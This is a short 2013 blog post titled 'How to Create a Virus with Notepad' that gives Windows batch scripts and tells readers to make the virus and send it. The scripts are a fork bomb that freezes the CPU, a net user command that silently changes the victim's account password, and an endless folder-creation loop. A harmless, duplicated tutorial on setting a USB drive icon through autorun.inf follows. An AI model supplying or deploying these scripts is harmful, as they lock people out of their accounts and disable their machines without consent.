Thursday, 2 May 2013
How to Create a Virus with Notepad 100% Working
Hi I am share How to How to Create a Virus with Notepad Its really working. Make Virus and send
How To Create Your Own Virus Using Batch Scripting
All code open notepad and save .bat file
So lest start
1 Freezes the CPU
%0|%0
save cpu.bat
1 Change Computer Password
@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::
save anything.bat
Make an Infinity of Folders
@echo off
:ztuts
md %random%
goto ztuts
:ztuts
md %random%
goto ztuts
How to change your USB Flash Drive Icon
I am share How to change your USB Flash Drive Icon (Done with Windows XP but should work on All Windows Versions).
Go to Start ---> All Programs ---> Accessories ---> Notepad
Type the following:
Go to File ----> Save As ----> Name it autorun.inf and save it in the Root of the USB Drive
Now all you need is an Icon. Icons can be downloaded off the internet but if you have a picture you want to convert into an Icon (.ico), there are plenty of programs to do so.
I use ImageToIcon.
When you get your Icon, move it to the Root of your USB Drive along with the Autorun file.
Unplug the drive and plug it back in and you should be able to see your custom icon.
(If unplugging the drive doesn't work, try restarting the computer)
Go to Start ---> All Programs ---> Accessories ---> Notepad
Type the following:
[AutoRun]Replace Usb Name and icon Name
label=°©Usb Name©°
ICON=icon Name.ico
Go to File ----> Save As ----> Name it autorun.inf and save it in the Root of the USB Drive
Now all you need is an Icon. Icons can be downloaded off the internet but if you have a picture you want to convert into an Icon (.ico), there are plenty of programs to do so.
I use ImageToIcon.
When you get your Icon, move it to the Root of your USB Drive along with the Autorun file.
Unplug the drive and plug it back in and you should be able to see your custom icon.
(If unplugging the drive doesn't work, try restarting the computer)
Subscribe to:
Posts (Atom)




